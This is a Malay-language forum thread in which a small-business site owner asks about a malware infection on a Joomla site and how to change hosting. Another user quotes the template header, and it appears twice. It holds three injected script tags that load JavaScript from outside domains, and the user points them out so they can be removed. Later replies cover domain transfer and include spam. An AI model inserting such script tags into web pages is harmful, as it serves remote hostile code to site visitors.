Nak tukar hosting macamana?

Joined
Jun 26, 2008
Messages
110
Likes
0
Points
16
Offline
#1
Assalam, saya sekarang gunakan Fivio sebagai hosting dan domain website saya. Masalahnya website saya telah infected oleh Malware, saya pun tak pasti kenapa. Saya dah msg bantuan kepada bahagian teknikal Fivio tetapi tiada jawapan/

Jadi saya nak minta bantuan disini... Harap ada yg sudi membantu..

www.bertuah.com.my
 

tux

freshman
Joined
Jul 19, 2007
Messages
46
Likes
0
Points
6
Age
29
Offline
#3
Fivio ni lembap juga rupanya.
buang natang ni dari jomla header template. Agaknyalah saya tak reti jomla.
Code:
<!--Width of template -->
<style type="text/css">
.main {width: 980px;margin: 0 auto;}
#ja-wrapper {min-width: 981px;}
</style>

[COLOR="#FF0000"]<script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script>[/COLOR]</head>

<body id="bd" class="fs3 FF">

<div id="ja-wrapper">
	<a name="Top" id="Top"></a>

	<!-- HEADER -->
 
Joined
Dec 31, 2007
Messages
4,277
Likes
0
Points
36
Offline
#4
ha ha ha ...........................gua pon pernah terkena .

Gua blah.
 
Joined
Jun 26, 2008
Messages
110
Likes
0
Points
16
Offline
#7
Fivio ni lembap juga rupanya.
buang natang ni dari jomla header template. Agaknyalah saya tak reti jomla.
Code:
<!--Width of template -->
<style type="text/css">
.main {width: 980px;margin: 0 auto;}
#ja-wrapper {min-width: 981px;}
</style>

[COLOR="#FF0000"]<script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script>[/COLOR]</head>

<body id="bd" class="fs3 FF">

<div id="ja-wrapper">
	<a name="Top" id="Top"></a>

	<!-- HEADER -->
mcmana eh nk buang dia? boleh bantu ke...
 
Joined
Jun 12, 2009
Messages
2,104
Likes
5
Points
38
Offline
#10
Nak tukar hosting, Nama domain urus sendiri atau beli pakej? Kalau berasingan senang kerja..
kalau pakej kena minta support hosting utk tukar DNS ke hosting baru.. :)
 
Joined
Jun 12, 2009
Messages
2,104
Likes
5
Points
38
Offline
#11
xpun minta kat hosting yang lama EPP Code untuk transfer domain ke hosting yang baru
domain .com.my @ .my ni leceh sikit.. better sebenarnya urus sendiri domain berbanding transfer domain ke owner hosting untuk uruskannya.

Lain hosting provider lain harga cas tahunan langganan domain.. Langgan Hosting, kat mana mana pun boleh guna.
 
Joined
Jun 26, 2008
Messages
110
Likes
0
Points
16
Offline
#12
website saya dah repair dan dah hubungi Google, tapi masa saya buka web saya keluar code ni dan saya dah buat php.ini dan skrg dah ok. cuma saya nak tanya code ni maksudnya hosting yg saya sewa tu dah lock sesuatu ke?

Warning: ini_set() has been disabled for security reasons in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 102

Warning: ini_set() has been disabled for security reasons in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 105

Warning: ini_set() has been disabled for security reasons in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 655

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/templates/ja_kyanite_ii/libs/mobile_device_detect.php on line 113

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/templates/ja_kyanite_ii/libs/mobile_device_detect.php on line 114

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/templates/ja_kyanite_ii/libs/mobile_device_detect.php on line 113

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/templates/ja_kyanite_ii/libs/mobile_device_detect.php on line 114
Farmasi Tuah Sdn. Bhd.
 
Last edited:
Joined
Oct 2, 2007
Messages
6,951
Likes
0
Points
38
Offline
#13
xpun minta kat hosting yang lama EPP Code untuk transfer domain ke hosting yang baru
ada sesetgh domain, diberi secara 'built-in' dalam pakej hosting...

cthnya.... beli plan XYZ dengan harga sekian2...percuma 1 domain....yg ini susah sket la nak mintak EPP code. kena slow talk la dengan hosting provider....

sbb tu ada baiknya beli domain dan hosting ditempat yg berasingan
 
Joined
Aug 19, 2013
Messages
8
Likes
0
Points
1
Offline
#14
Tips mudah dari boleh didapati di ananova dot com/10-steps-to-switching-hosting-providers

moga membantu!
 
Joined
Jun 26, 2008
Messages
110
Likes
0
Points
16
Offline
#15
ada sesetgh domain, diberi secara 'built-in' dalam pakej hosting...

cthnya.... beli plan XYZ dengan harga sekian2...percuma 1 domain....yg ini susah sket la nak mintak EPP code. kena slow talk la dengan hosting provider....

sbb tu ada baiknya beli domain dan hosting ditempat yg berasingan
masa saya beli hosting ni dari Fivio mmg xde percuma apa2, hosting dan domain lain2 harga...
 
Joined
Aug 29, 2013
Messages
1
Likes
0
Points
0
Offline
#17
I am involved in evolving your subscriber, so great pleasure contain me modified. I find the thoughts and mind-set of this post, very inspiring and actually worth following. pleasant work...
 
Joined
Sep 4, 2013
Messages
33
Likes
0
Points
0
Offline
#20
Just pendapat, cuba backup dulu semua file dalam hosting lama kat PC, subscribe hosting baru, set Domain Name Server untuk hosting baru di akaun domain, upload balik file yang backup mula-mula tadi di hosting yang baru.

-harap memberi manfaat-
Rekomen hosting - Hostgator- coupon diskaun: infosewawang
 
Top